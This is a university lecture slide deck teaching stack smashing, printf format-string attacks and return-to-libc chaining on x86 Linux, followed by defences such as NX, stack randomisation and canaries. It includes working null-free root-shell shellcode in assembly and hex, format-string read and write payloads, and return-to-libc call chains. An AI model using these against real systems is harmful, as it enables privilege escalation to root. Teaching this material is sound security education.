stack smashing, printf, return-to-libc


Post on 05-Jan-2016


Page 1: Stack Smashing, printf, return-to-libc

Stack Smashing, printf, return-to-libc

Francis Chang <[email protected]>

Systems & Networking Lab

Portland State University

Page 2: Stack Smashing, printf, return-to-libc

Up Until now

Any questions/comments about previous material / midterm?

Page 3: Stack Smashing, printf, return-to-libc

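Process Address Space

[Diagram: layout of a process address space, from start address = 0x0 to 0xC0000000. Labeled regions: the new binary (Code, Data, BSS) and the Heap; the program interpreter (ld.so), with its own Code, Data, and BSS, at 0x4000000; a further Code, Data, BSS group; the Stack at start_stack; and the pointer to args & env, the arguments, and the environment.]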

Page 4: Stack Smashing, printf, return-to-libc

Process Address Space

[Same address-space diagram as on the previous slide, with one region marked:]

What we’re interested in in this talk

Page 5: Stack Smashing, printf, return-to-libc

Stack Frame

void function(int a, int b) {
    printf("hello");
    return;
}

int main(void) {
    function(1, 2); // What happens here?
}

Page 6: Stack Smashing, printf, return-to-libc

Stack Frame

[Diagram: one stack frame, one word (e.g. 4 bytes) per row, from higher memory addresses to lower memory addresses: function parameters, return address, old base pointer (saved frame pointer), local variables. Address labels: SFP, SFP + 8. Stack grows high to low.]

Page 7: Stack Smashing, printf, return-to-libc

Stack Frame

Calling void function(int a, int b)

[Diagram: the frame for this call, one word (e.g. 4 bytes) per row, from higher to lower memory addresses: b, a, return address, old base pointer (saved frame pointer), local variables…, with SP marking the stack pointer. Address labels: SFP, SFP + 8. Stack grows high to low.]

Page 8: Stack Smashing, printf, return-to-libc

Simple program

void function() {
    int x = 0;
    char buffer[8];
    memcpy(buffer, "abcdefg", 8);
    printf("%s %d", buffer, x);
}

Output: ...

[Diagram: stack frame, one word (e.g. 4 bytes) per row, from higher to lower addresses: return address, old base pointer (saved frame pointer), int x, buffer[4]..buffer[7], buffer[0]..buffer[3]. Stack grows high to low.]

Page 9: Stack Smashing, printf, return-to-libc

Simple program

void function() {
    int x = 0;
    char buffer[8];
    memcpy(buffer, "abcdefg", 8);
    printf("%s %d", buffer, x);
}

Output: abcdefg 0

[Diagram: stack frame, one word (e.g. 4 bytes) per row, from higher to lower addresses: return address, old base pointer (saved frame pointer), int x = 0x00000000, buffer[4..7] = "efg", buffer[0..3] = "abcd". Stack grows high to low.]

Page 10: Stack Smashing, printf, return-to-libc

Simple program 2

void function() {
    int x = 0;
    char buffer[8];
    memcpy(buffer, "abcdefghijk", 12);
    printf("%s %d", buffer, x);
}

Output: ...

[Diagram: stack frame, one word (e.g. 4 bytes) per row, from higher to lower addresses: return address, old base pointer (saved frame pointer), int x, buffer[4]..buffer[7], buffer[0]..buffer[3]. Stack grows high to low.]

Page 11: Stack Smashing, printf, return-to-libc

Simple program 2

void function() {
    int x = 0;
    char buffer[8];
    memcpy(buffer, "abcdefghijk", 12);
    printf("%s %d", buffer, x);
}

Output: abcdefghijk 7039593

[Diagram: stack frame, one word (e.g. 4 bytes) per row, from higher to lower addresses: return address, old base pointer (saved frame pointer), int x = 0x006b6a69 (the bytes "ijk" plus the terminating null), buffer[4..7] = "efgh", buffer[0..3] = "abcd". Stack grows high to low.]

Page 12: Stack Smashing, printf, return-to-libc

Buffer Overflow

The idea of a buffer overflow…

Trick the program into overwriting its buffer…

[Diagram: stack frame, one word (e.g. 4 bytes) per row, from higher to lower addresses: b, a, return address, old base pointer (saved frame pointer), buffer[4]..buffer[7], buffer[0]..buffer[3]. Stack grows high to low.]

Page 13: Stack Smashing, printf, return-to-libc

Buffer Overflow

So now that we’ve messed up the program’s memory, what can we do?

1st: We have a bunch of memory we can control. We can insert malicious code.

But how do we execute that code?

We must change the instruction pointer (IP)….

[Diagram: stack frame, one word (e.g. 4 bytes) per row, from higher to lower addresses: b, a, return address, old base pointer (saved frame pointer), buffer[4]..buffer[7], buffer[0]..buffer[3]. Stack grows high to low.]

Page 14: Stack Smashing, printf, return-to-libc

Buffer Overflow

void function(int a, int b) {
    char buffer[8];
    return;
}

Return statement:
- Clean off the function’s stack frame
- Jump to return address

Can use this to set the instruction pointer!

[Diagram: the same frame with the return address replaced, from higher to lower addresses: b, a, new return addr, old base pointer (saved frame pointer), buffer[4]..buffer[7], buffer[0]..buffer[3]. Stack grows high to low; each row is one word (e.g. 4 bytes).]

Page 15: Stack Smashing, printf, return-to-libc

Buffer Overflow

The anatomy of a buffer overflow:
1) We can inject malicious code
2) We can set the IP

So, put malicious code in the buffer, and set the return address to point to the shell code!

[Diagram: the overflowed frame, from higher to lower addresses: a, new return addr, then shell code filling the rest of the frame. Stack grows high to low.]

Page 16: Stack Smashing, printf, return-to-libc

Buffer Overflow

[Diagram: the overflowed frame, from higher to lower addresses: a, new return addr, then shell code filling the rest of the frame. Stack grows high to low.]

Reality check: Looks great in theory, but not in practice…

We don’t know exactly where the buffer is, so we don’t really know where the shell code is, nor where the return address is…

We can approximate!

Page 17: Stack Smashing, printf, return-to-libc

New Diagram

More abstract (but more correct) picture. These are the components we’re interested in:

[Diagram: the stack frame drawn as a row: Buffer[0..256], [stuff], return addr, [stuff]. Stack grows high to low.]

Page 18: Stack Smashing, printf, return-to-libc

Buffer Overflow

So the data we overwrite starts from here…

[Diagram: Buffer[0..256], [stuff], return addr, [stuff], with the buffer overflow (injected data) marked against it. Stack grows high to low.]

Page 19: Stack Smashing, printf, return-to-libc

Buffer Overflow (Idealized)

Ideally, this is what a buffer overflow attack looks like…

[Diagram: Buffer[0..256], [stuff], return addr, [stuff]; the injected data is the shell code followed by NewAddr. Stack grows high to low.]

Page 20: Stack Smashing, printf, return-to-libc

Buffer Overflow (Reality)

Reality #1: We don’t know where the return address is. What do we do?

[Diagram: Buffer[0..256], [stuff], return addr, [stuff]; the injected data is the shell code followed by NewAddr. Stack grows high to low.]

Page 21: Stack Smashing, printf, return-to-libc

Buffer Overflow (Addr Spam)

Solution: Spam the new address. Repeat it many times in the injected data, so that one of the copies overwrites the return address.

[Diagram: Buffer[0..256], [stuff], return addr, [stuff]; the injected data is the shell code followed by NewAddr repeated four times. Stack grows high to low.]

Page 22: Stack Smashing, printf, return-to-libc

Buffer Overflow (Reality)

Problem #2: We don’t know where the shell code starts.

(Addresses are absolute, not relative)

[Diagram: Buffer[0..256], [stuff], return addr, [stuff]; the injected data is the shell code followed by NewAddr repeated four times. Stack grows high to low.]

Page 23: Stack Smashing, printf, return-to-libc

Quick Peek at the shellcode

xor eax, eax

mov al, 70

xor ebx, ebx

xor ecx, ecx

int 0x80

jmp short two

one:

pop ebx

xor eax, eax

mov [ebx+7], al

mov [ebx+8], ebx

mov [ebx+12], eax

mov al, 11

lea ecx, [ebx+8]

lea edx, [ebx+12]

int 0x80

two:

call one

db '/bin/shXAAAABBBB'

Shell Code

This is real shellcode that works (more detail later).

The problem is, we only have a rough idea where it will end up in memory. So, where to put the instruction pointer?

Page 24: Stack Smashing, printf, return-to-libc

Quick Peek at the shellcode

[Same shellcode listing as on the previous slide, with candidate instruction-pointer positions marked "IP?" alongside the code.]

This is real shellcode that works (more detail later).

The problem is, we only have a rough idea where it will end up in memory. So, where to put the instruction pointer?

Page 25: Stack Smashing, printf, return-to-libc

The NOP Sled

[Same shellcode listing, with candidate instruction-pointer positions marked "IP?" alongside the code.]

What happens with a mis-set instruction pointer?

Well, the shellcode doesn’t work…

Page 26: Stack Smashing, printf, return-to-libc

The NOP Sled

[Same shellcode listing, with the "IP?" markers and a long run of NOP instructions added.]

New idea: NOP Sled

NOP = Assembly instruction (No Operation)

What a NOP instruction does: Advance the instruction pointer by one, and do nothing else.

So, if we create a lot of them….

Page 27: Stack Smashing, printf, return-to-libc

Buffer Overflow (Reality)

The anatomy of a real buffer overflow attack, now with NOP sled!

[Diagram: Buffer[0..256], [stuff], return addr, [stuff]; the injected data is a NOP sled, the shell code, and NewAddr repeated four times. Stack grows high to low.]

Page 28: Stack Smashing, printf, return-to-libc

Motivation

Stepping back…

Motivation for our buffer overflow:
- We’re bad
- We have a unix account
- We want super-user access

So, we find a setuid program and trick it into giving us a root shell.

Page 29: Stack Smashing, printf, return-to-libc

Motivation

Step 1: Locate a SETUID program with a stack buffer that’s vulnerable to overflow.

(i.e. search for things that use strcpy ;)

Page 30: Stack Smashing, printf, return-to-libc

Sample Victim Program

int main( char *argc, char *argv[] ) {
    char buffer[500];
    strcpy( buffer, argv[1] );
    return 0;
}

strcpy expects a null-terminated string

Roughly 500 bytes of memory to fit our shell code into

Page 31: Stack Smashing, printf, return-to-libc

Writing shellcode

Let’s discuss how to write some x86 shellcode for Linux

First, a primer on x86 assembly

Page 32: Stack Smashing, printf, return-to-libc

Registers

For our purposes:

Four 32-bit general purpose registers: eax, ebx, ecx, edx

al is a name for “the lower 8 bits of eax”

Stack pointer: esp

Fun fact: Once upon a time, x86 was only a 16-bit CPU. So, when they upgraded x86 to 32 bits, they added an “e” in front of every register name and called it “extended”.

Page 33: Stack Smashing, printf, return-to-libc

x86 Assembly

mov <dest>, <src>

Move the value from <src> into <dest>

Used to set initial values

add <dest>, <src>

Add the value from <src> to <dest>

sub <dest>, <src>

Subtract the value from <src> from <dest>

Page 34: Stack Smashing, printf, return-to-libc

x86 Assembly

push <target>

Push the value in <target> onto the stack

Also decrements the stack pointer, ESP (remember stack grows from high to low)

pop <target>

Pop the value from the top of the stack and put it in <target>

Also increments the stack pointer, ESP

Page 35: Stack Smashing, printf, return-to-libc

x86 Assembly

jmp <address>

Jump to an instruction (like goto)

Change the EIP to <address>

call <address>

A function call.

Pushes the address of the next instruction (the return address) onto the stack, and jumps to <address>

Page 36: Stack Smashing, printf, return-to-libc

x86 Assembly

lea <dest>, <src>

Load Effective Address of <src> into register <dest>.

Computes the address that <src> refers to and puts it in a register, without reading the memory at that address

int <value>

interrupt: a software interrupt that transfers control to the operating system kernel, with interrupt number <value>

int 0x80 means “Linux system call”

Page 37: Stack Smashing, printf, return-to-libc

Goals of Shellcode

Goal: Spawn a root shell (/bin/sh)

It needs to:

1) setreuid( 0, 0 ) // real UID, effective UID

2) execve( “/bin/sh”, *args[], *env[] );

For simplicity, args points to [“/bin/sh”, NULL] and env points to NULL, which is an empty array []

Page 38: Stack Smashing, printf, return-to-libc

Interrupt convention

int 0x80: System call interrupt

eax – System call number (eg. 1-exit, 2-fork, 3-read, 4-write)

ebx – argument #1

ecx – argument #2

edx – argument #3

Page 39: Stack Smashing, printf, return-to-libc

Shellcode Attempt #1

1st part:

section .data ; section declaration

filepath db "/bin/shXAAAABBBB" ; the string

section .text ; section declaration

global _start ; Default entry point for ELF linking

_start:

; setreuid(uid_t ruid, uid_t euid)

mov eax, 70 ; put 70 into eax, since setreuid is syscall #70

mov ebx, 0 ; put 0 into ebx, to set real uid to root

mov ecx, 0 ; put 0 into ecx, to set effective uid to root

int 0x80 ; Call the kernel to make the system call happen

Page 40: Stack Smashing, printf, return-to-libc

Shellcode Attempt #1

2nd part:

; filepath db "/bin/shXAAAABBBB" ; the string

; execve(const char *filename, char *const argv [], char *const envp[])

mov eax, 0 ; put 0 into eax

mov ebx, filepath ; put the address of the string into ebx

mov [ebx+7], al ; put the 0 from eax where the X is in the string

; ( 7 bytes offset from the beginning)

mov [ebx+8], ebx ; put the address of the string from ebx where the

; AAAA is in the string ( 8 bytes offset)

mov [ebx+12], eax ; put a NULL address (4 bytes of 0) where the

; BBBB is in the string ( 12 bytes offset)

mov eax, 11 ; Now put 11 into eax, since execve is syscall #11

lea ecx, [ebx+8] ; Load the address of where the AAAA was in the

; string into ecx

lea edx, [ebx+12] ; Load the address of where the BBBB is in the

; string into edx

int 0x80 ; Call the kernel to make the system call happen

Page 41: Stack Smashing, printf, return-to-libc

Shellcode Problem #1

It uses two segments, with a data segment to store “/bin/sh”:

filepath db "/bin/shXAAAABBBB"

mov ebx, filepath ; put the address of the string into ebx

Not cool. We don’t know where this code is going to be relocated. Can’t use a pointer in our buffer overflow!

Page 42: Stack Smashing, printf, return-to-libc

Shellcode Trick #1

Observation:

1) The “call” instruction pushes the address of the instruction that follows it onto the stack.

2) The “call” and “jmp” instructions can take arguments relative to the current instruction pointer

We can use this to get the address of where our data is!

Page 43: Stack Smashing, printf, return-to-libc

Shellcode Trick #1

Outline of trick:

jmp two

one:

pop ebx

[program code goes here]

two:

call one

db 'this is a string'

Page 44: Stack Smashing, printf, return-to-libc

Shellcode Attempt #2

1st part:

; setreuid(uid_t ruid, uid_t euid)

mov eax, 70 ; put 70 into eax, since setreuid is syscall #70

mov ebx, 0 ; put 0 into ebx, to set real uid to root

mov ecx, 0 ; put 0 into ecx, to set effective uid to root

int 0x80 ; Call the kernel to make the system call happen

jmp short two ; Jump down to the bottom for the call trick

one:

pop ebx ; pop the "return address" from the stack

; to put the address of the string into ebx

[ stuff here ]

two:

call one ; Use a call to get back to the top and get the

db '/bin/shXAAAABBBB' ; address of this string

Page 45: Stack Smashing, printf, return-to-libc

Shellcode Attempt #2

2nd part:

; the pointer to "/bin/shXAAAABBBB" is already in ebx

; execve(const char *filename, char *const argv [], char *const envp[])

mov eax, 0 ; put 0 into eax

mov [ebx+7], al ; put the 0 from eax where the X is in the string

; ( 7 bytes offset from the beginning)

mov [ebx+8], ebx ; put the address of the string from ebx where the

; AAAA is in the string ( 8 bytes offset)

mov [ebx+12], eax ; put a NULL address (4 bytes of 0) where the

; BBBB is in the string ( 12 bytes offset)

mov eax, 11 ; Now put 11 into eax, since execve is syscall #11

lea ecx, [ebx+8] ; Load the address of where the AAAA was in the string

; into ecx

lea edx, [ebx+12] ; Load the address of where the BBBB was in the string

; into edx

int 0x80 ; Call the kernel to make the system call happen

Page 46: Stack Smashing, printf, return-to-libc

Shellcode Problem #2

Looks like we have a working shellcode now!

But… remember how we’re inserting it?

strcpy( buffer, argv[1] );

strcpy copies a null-terminated string, so it stops at the first null byte.

Let’s look at the assembled shell code.

Page 47: Stack Smashing, printf, return-to-libc

Shellcode Problem #2

Et voilà! Shellcode!

b846 0000 0066 bb00 0000 0066 b900 0000

00cd 80eb 2866 5b66 b800 0000 0067 8843

0766 6789 5b08 6667 8943 0c66 b80b 0000

0066 678d 4b08 6667 8d53 0ccd 80e8 d5ff

2f62 696e 2f73 6858 4141 4141 4242 4242

But all the nulls!

Where do all these nulls come from?

Page 48: Stack Smashing, printf, return-to-libc

Shellcode Trick #2a

Loading up all the zeros in the registers for various reasons…

mov eax, 0 ->

Causes 32-bits of 0’s to be written into our shellcode…

Page 49: Stack Smashing, printf, return-to-libc

Shellcode Trick #2a

Idea! XOR of anything with itself gives us zero

mov ebx, 0 -> xor ebx, ebx

mov ecx, 0 -> xor ecx, ecx

mov eax, 0 -> xor eax, eax

12 nulls removed!

As a nice side-benefit, it’s 9 bytes shorter too!

But still, some remaining nulls…

Page 50: Stack Smashing, printf, return-to-libc

Shellcode Trick #2b

Where do the other nulls come from?

Must load eax registers with the syscall numbers (setreuid = 70, execve = 11)

mov eax, 70 ~= mov eax, 0x00000046

Idea: Set eax to zero with the last trick, and then overwrite the low-order byte

xor eax, eax

mov al, 70

Page 51: Stack Smashing, printf, return-to-libc

Final Shellcode

1st part:

; setreuid(uid_t ruid, uid_t euid)

xor eax, eax ; first eax must be 0 for the next instruction

mov al, 70 ; put 70 into eax, since setreuid is syscall #70

xor ebx, ebx ; put 0 into ebx, to set real uid to root

xor ecx, ecx ; put 0 into ecx, to set effective uid to root

int 0x80 ; Call the kernel to make the system call happen

jmp short two ; Jump down to the bottom for the call trick

one:

pop ebx ; pop the "return address" from the stack

; to put the address of the string into ebx

[stuff here]

two:

call one ; Use a call to get back to the top and get the

db '/bin/shXAAAABBBB' ; address of this string

Page 52: Stack Smashing, printf, return-to-libc

Final Shellcode

2nd part:

; execve(const char *filename, char *const argv [], char *const envp[])

xor eax, eax ; put 0 into eax

mov [ebx+7], al ; put the 0 from eax where the X is in the string

; ( 7 bytes offset from the beginning)

mov [ebx+8], ebx ; put the address of the string from ebx where the

; AAAA is in the string ( 8 bytes offset)

mov [ebx+12], eax ; put a NULL address (4 bytes of 0) where the

; BBBB is in the string ( 12 bytes offset)

mov al, 11 ; Now put 11 into eax, since execve is syscall #11

lea ecx, [ebx+8] ; Load the address of where the AAAA was in the string

; into ecx

lea edx, [ebx+12] ; Load the address of where the BBBB was in the string

; into edx

int 0x80 ; Call the kernel to make the system call happen

Page 53: Stack Smashing, printf, return-to-libc

Final Shellcode

Assembled:

31c0 b046 31db 31c9 cd80 eb16 5b31 c088

4307 895b 0889 430c b00b 8d4b 088d 530c

cd80 e8e5 ffff ff2f 6269 6e2f 7368 5841

4141 4142 4242 42

55 bytes!

/bin/shXAAAABBBB can be shortened to /bin/sh

46 bytes!

Page 54: Stack Smashing, printf, return-to-libc

Other things we could do..

More tricks to shorten assembly:

Push “/bin/sh” onto the stack as immediate values, instead of using the call trick.

Shave off bytes, because not all instructions are the same size. E.g.:

xor eax, eax / mov al, 70 (4 bytes) -> push byte 70 / pop eax (3 bytes)

Page 55: Stack Smashing, printf, return-to-libc

Other things we could do..

More innocuous looking code:

- Construct an attack out of only ASCII characters
- Polymorphic code
- XOR encrypting
- Tools such as ADMutate

The result of that….

%JONE%501:TX-3399-Purr-!TTTP\%JONE%501:-tKK4-gXn%-uPy%P-

8Jxn-%8sxP-dddd-777j-JdbyP-Uu%U-pp6A-At%RP-wwww-OO33-s9D

VP-r%O%-wDee-yDmuP-CCCC-%0w%-42e6P-H8z8-Y8q8P-jj4j-d9L%-

2658PPPPPPPPPPPPPPPP

Page 56: Stack Smashing, printf, return-to-libc

Other things we could do..

Shell code has to fit between the buffer and the return address. What if the buffer is too small to fit shell code?

Another trick: Stick the shell code in an environment variable.

[Diagram: Buffer[0..256], [stuff], return addr, [stuff]; the injected data is a NOP sled, the shell code, and NewAddr repeated four times. Stack grows high to low.]

Page 57: Stack Smashing, printf, return-to-libc

Armed with shellcode now

Now that we have the shellcode, let’s revisit the original problem:

[Diagram: Buffer[0..256], [stuff], return addr, [stuff]; the injected data is a NOP sled, the shell code, and NewAddr repeated four times. Stack grows high to low.]

We have all the components.. Except…

How to set the new instruction pointer to poke at our NOP sled?

Page 58: Stack Smashing, printf, return-to-libc

Insertion address

How to find the insertion address?

Well.. we guess.

int main( char *argc, char *argv[] ) {

char buffer[500];

strcpy( buffer, argv[1] );

return 0;

}

Page 59: Stack Smashing, printf, return-to-libc

Insertion address 1

Guessing technique #1: GDB to find the stack pointer!

$ gdb sample

(gdb) break main

Breakpoint 1 at 0x8048365

(gdb) run

Starting program: sample

Breakpoint 1, 0x08048365 in main ()

(gdb) p $esp

$1 = (void *) 0xbffff220

buffer probably near the stack top at this point

int main( char *argc, char *argv[] ) {

char buffer[500];

strcpy( buffer, argv[1] );

return 0;

}

Page 60: Stack Smashing, printf, return-to-libc

Insertion address 2

Guessing technique #2: If the program was compiled with debug information, we can read the buffer’s address directly

$ gdb sample

(gdb) break main

Breakpoint 1 at 0x804836f

(gdb) run

Starting program: sample

Breakpoint 1, main (argc=0x1 <Address 0x1 out of bounds>, argv=0xbffffa84)at sample.c:5

5 strcpy( buffer, argv[1] );

(gdb) p &buffer

$1 = (char *(*)[500]) 0xbffff220

int main( char *argc, char *argv[] ) {

char buffer[500];

strcpy( buffer, argv[1] );

return 0;

}

Page 61: Stack Smashing, printf, return-to-libc

Insertion address 3

Guessing technique #3: Add some debug statements, and hope that doesn’t change the address much

$ ./sample

0xbffff220

int main( char *argc, char *argv[] ) {

char buffer[500];

printf( "%p\n", (void *)&buffer );

strcpy( buffer, argv[1] );

return 0;

}

Page 62: Stack Smashing, printf, return-to-libc

Things to keep in mind

Stack addresses shift a little depending on the execution context (for example, the size of the environment and the arguments). Vary your guess up and down by a few hundred bytes and cross your fingers

Intel x86 is little-endian. Least significant bytes come first.

1234567890 = 0x499602D2 -> D2 02 96 49

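The repeated return addresses must line up on a 4-byte boundary with the saved return address; x86 instructions themselves have no alignment requirement. (Luckily, the buffer start will usually be word aligned)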

Page 63: Stack Smashing, printf, return-to-libc

Number of exploits

Some stats for you:

2002: 22.5% of security fixes provided by vendors were for buffer overflows

2004: All available exploits: 75% were buffer overflows

So removing buffer overflows is important! 75% of available exploits were buffer overflows!

Page 64: Stack Smashing, printf, return-to-libc

Defending stack smashes 1

So, how can we defend against stack smash attacks?

Stop writing bad code!

int main( char *argc, char *argv[] ) {

char buffer[500];

strcpy( buffer, argv[1] );

return 0;

}

Bad code heuristic: grep strcpy *.c

Page 65: Stack Smashing, printf, return-to-libc

Defending stack smashes 2

Hardware support.

In x86 there’s been no way to mark pages as containing executable code or not. (For compatibility)

This is why buffer overflows (and many other exploits) exist.

NX technology – No-eXecute bits to mark memory pages. (new, few months ago)

Page 66: Stack Smashing, printf, return-to-libc

Defending stack smashes 2

NX bit: caveats

- Additional bookkeeping information required

- Only works in PAE 64-bit pagetable format

(Physical Address Extension mode)

(PAE is for machines to use more than 4GB of physical memory)

- Approximately 6% overhead on system performance

- Redhat only uses it on SMP and hugemem kernels (not uniprocessor)

Page 67: Stack Smashing, printf, return-to-libc

Defending stack smashes 3

Randomized stack pointer.

Most OS’s used to have pretty deterministic behaviour.

Intentionally randomizing stack pointer makes it harder to guess your insertion point.

MDK 10: No randomization

Redhat 8: 16KB of randomization (rooster!)

Fedora Core 3: 16MB of randomization

Page 68: Stack Smashing, printf, return-to-libc

Defending stack smashes 3

Execshield for Linux

- randomizes the stack

- location of shared libraries

- start of program heap

PIE – Position Independent Executables

- GNU Compiler extension for ELF executables

- Allows binaries to be locatable anywhere in the address space

- (Used in conjunction with execshield)

Page 69: Stack Smashing, printf, return-to-libc

Defending stack smashes 4

Segment limit approach

- Approximates the no-execute bit

- An option for PaX and ExecShield

- Plays tricks with segment registers

- 1st N megabytes of memory marked as non-executable

Page 70: Stack Smashing, printf, return-to-libc

Defending stack smashes 4

[Diagram: the process address space from the earlier slide (start address = 0x0, new binary, heap, program interpreter ld.so at 0x4000000, stack at start_stack, arguments and environment, 0xC0000000), divided into an Executable region and a Non-Executable region.]

Page 71: Stack Smashing, printf, return-to-libc

Defending stack smashes 5

Compiler extensions à la StackGuard

- Inserts a canary value into the stack

- Checks that canary is intact before returning from a function call

- Canary is randomized every time program is run

- Contains a NULL byte to prevent buffer overruns past the return address

[Diagram: stack frame with a canary, from higher to lower addresses: function args, return address, canary value, old base pointer (saved frame pointer), local variables. Stack grows high to low.]

Page 72: Stack Smashing, printf, return-to-libc

What if…?

What if the stack grew from low addresses to high addresses? Wouldn’t this eliminate buffer overflow attacks, since we couldn’t write over the return address?

Well. No. If you think about strcpy(), there’s a return address on both sides of the buffer: the return address of the strcpy() call itself would sit above the buffer.

int main( char *argc, char *argv[] ) {

char buffer[500];

strcpy( buffer, argv[1] );

return 0;

}

* Nobody seems to know why we grow stacks from high addresses to low addresses.

Page 73: Stack Smashing, printf, return-to-libc

Printf hacks

Page 74: Stack Smashing, printf, return-to-libc

Printf hacks

printf: C formatted output function

Relatives: sprintf, fprintf, asprintf, snprintf, vsprintf, vprintf, vfprintf, etc…..

int x = 42;

printf( "The value of X is %d.\n", x );

>> The value of X is 42.

Valuable observation: Mixes control codes and data! Whee, room for malware!

Page 75: Stack Smashing, printf, return-to-libc

Our printf victim

Naïve program:

int main( int argc, char *argv[] ) {

printf( argv[1] );

return 0;

}

Unvalidated input! Time to stick in some malware!

Page 76: Stack Smashing, printf, return-to-libc

printf’s stack

printf( "%d %d", arg1, arg2 );

[Diagram: printf’s stack frame, one word (e.g. 4 bytes) per row, from higher to lower addresses: printf argument 2, printf argument 1, pointer to format string, return address, old base pointer, local variables… Stack grows high to low.]

Page 77: Stack Smashing, printf, return-to-libc

Reading memory with printf

[Diagram: printf’s stack frame, from higher to lower addresses: printf argument 2, printf argument 1, pointer to format string, return address, old base pointer, local variables… Stack grows high to low.]

Format specifier: %.8x prints an unsigned int as 8 hex digits

Can use this simple formatting to read off the values on the stack

int main(int argc, char *argv[]) {
    printf( argv[1] );
    return 0;
}

$ ./printf %.8x.%.8x.%.8x.%.8x.%.8x.%.8x.%.8x.%.8x.%.8x.%.8x.%.8x.%.8x

61009d63.610097c0.00000000.0022ff40.61007549.00000002.615a06f4.0a010288.0022ff24.00000000.00000000.00000003

Page 78: Stack Smashing, printf, return-to-libc

printf parameter access

Little-known printf format specifier:

Can choose which parameter you reference!

printf(“%5$d %2$d”, 10, 20, 30, 40, 50, 60, 70, 80, 90);

>> 50 20

So now we can access any parameter down the stack!

Page 79: Stack Smashing, printf, return-to-libc

Feeding yourself addresses

%s format specifier

String format -> Takes an address, and prints the string stored at that address

char *pointer_to_string = “hello”;

printf( “%s”, pointer_to_string );

>> hello

What can we do with this?

Page 80: Stack Smashing, printf, return-to-libc

Feeding yourself addresses

Looking at our victim code….

int main( int argc, char *argv[] ) {

printf( argv[1] );

return 0;

}

So we can feed in values in our format string since it’s on the stack.

What does this mean?

We can now read from arbitrary addresses with %s!

These values are stored on the stack!

Page 81: Stack Smashing, printf, return-to-libc

Writing memory

Another little-known printf format specifier:

Can write values with %n (number of characters written so far)

printf(“hello%n”, &my_int);

printf(“%d”, my_int);

>> hello5

So we can write small values into memory! (limited by length of our formatted output)

Using the trick of feeding ourselves addresses, we can write anywhere in memory now!

Page 82: Stack Smashing, printf, return-to-libc

Writing large numbers

But what if we want to write large numbers? Like POINTERS.

Multiple, staggered writes, 1 byte at a time. Suppose we can write values 0-255 with no problem.

32-bit value 0x?? -> Little endian memory: ?? 00 00 00

Eg.

32-bit value 0x1A -> Little endian memory: 1A 00 00 00

Break it up into 4 1-byte writes.

Page 83: Stack Smashing, printf, return-to-libc

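Writing large numbers

Example: Suppose we want the bytes AA BB CC DD in memory starting at address 0x10000000 (read back as a little-endian 32-bit value, that is 0xDDCCBBAA).

Write          Address       Bytes written
First write    0x10000000    AA 00 00 00
Second write   0x10000001    BB 00 00 00
Third write    0x10000002    CC 00 00 00
Fourth write   0x10000003    DD 00 00 00

Result at 0x10000000: AA BB CC DD (followed by three zero bytes left over from the fourth write)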

Page 84: Stack Smashing, printf, return-to-libc

What’s handy about printf

- Can get around all the no-execute flags on memory, since no injected code is executed…

- Can read and write anywhere we want to from memory

Another trick in our handy arsenal of hacker weapons…

But how to use this in getting us a shell? .. More in a bit..

Page 85: Stack Smashing, printf, return-to-libc

Printf Protection

Good programming practice:

Don’t ever do: printf( my_variable );

Use: printf( “%s”, my_variable );

Format Guard:

- Special compiler

- encodes parameters at compile time

- Can’t change the format at runtime

- Can have trouble with localized binaries, which have dynamically changing strings

Page 86: Stack Smashing, printf, return-to-libc

Return to libc

Idea:

- We (the attacker) can manipulate the stack.

- The system may be clever, and not allow us to execute code on the stack.

- So… Let’s exploit existing code, called with our arguments

- libc is an attractive target, because it has very powerful functions, and is linked to by almost everything

(libc is the standard C library)

Page 87: Stack Smashing, printf, return-to-libc

Return to libc

How do we jump to libc code?

- Same as any buffer overflow exploit: overwrite a return address on the stack.

How do we figure out where to jump to?

- Without address randomization, a libc function is always in the same place on a given system. We can figure out where it is by writing a simple test program, or using gdb.

Page 88: Stack Smashing, printf, return-to-libc

Return to libc

libc functions are called just like any other function

- push arguments on the stack

- push your return address onto the stack

- call the function

Since we’re exploiting a buffer overflow, this will appear on our stack

[Diagram: the injected data, drawn as a row: function address, function return addr, Arg1, Arg2, Arg3… Stack grows high to low.]

Page 89: Stack Smashing, printf, return-to-libc

Spawning a shell system()

Suppose we want to call system(“/bin/sh”) to drop our shell. It might look like this

Since we’re exploiting a buffer overflow, this will appear on our stack…

(return addr is not important)

[Diagram: the injected data, drawn as a row: system() address, return addr, pointer to string, “/bin/sh”. Stack grows high to low.]

Page 90: Stack Smashing, printf, return-to-libc

Spawning a shell system()

This drops a shell, but not a root shell.

Why? We have to call setuid(0) ourselves! Otherwise system() will drop our privileges.

What to do?

[Diagram: the injected data, drawn as a row: system() address, return addr, pointer to string, “/bin/sh”. Stack grows high to low.]

Page 91: Stack Smashing, printf, return-to-libc

Chaining return to libc calls

Need to call setuid(0) and then system(“/bin/sh”).

Idea: Set the return address for when we call setuid() so when setuid() returns, it jumps to system(). Clever!

[Diagram: the injected data, drawn as a row: setuid() address, system() addr, setuid() arguments, system() arguments. Stack grows high to low.]

Page 92: Stack Smashing, printf, return-to-libc

Chaining setuid() & system()

Still one tragic flaw (hamartia)

- The argument of setuid(0) consists of null bytes. We can’t write nulls if we’re doing a buffer overflow exploit through strcpy.

What else can we do?

- Observation: execl(“/bin/sh”, “/bin/sh”, 0 ) can spawn a root shell, without dropping our privileges.

- But it still has the “writing a null byte” problem

Page 93: Stack Smashing, printf, return-to-libc

Printf to the rescue

Recall:

- If we have access to the buffer, we can use printf to read and write arbitrary data to arbitrary addresses.

- Idea: Use printf() to write the nulls we need for us!

- So: Chain printf() and execl()

Page 94: Stack Smashing, printf, return-to-libc

Chaining return to libc calls

1) Printf() executes and constructs the arguments we need for execl().

2) Printf() completes, and returns to execl() which now has proper arguments for spawning /bin/sh

3) We get our root shell.

4) Victory dance!

[Diagram: the injected data, drawn as a row: printf() address, execl() addr, printf() arguments, execl() arguments. Stack grows high to low.]

Page 95: Stack Smashing, printf, return-to-libc

Defending return-to-libc

Problems:

- Especially brittle if we’re not sure where we are in memory

Defences:

- Randomizing pointers will help

- Canary values detect stack buffer overflows before the function returns

- Eliminate strcpy’s

Page 96: Stack Smashing, printf, return-to-libc

References

Hacking: The Art of Exploitation, by Jon Erickson

New Security Enhancements in Red Hat Enterprise Linux v.3, update 3, by Arjan van de Ven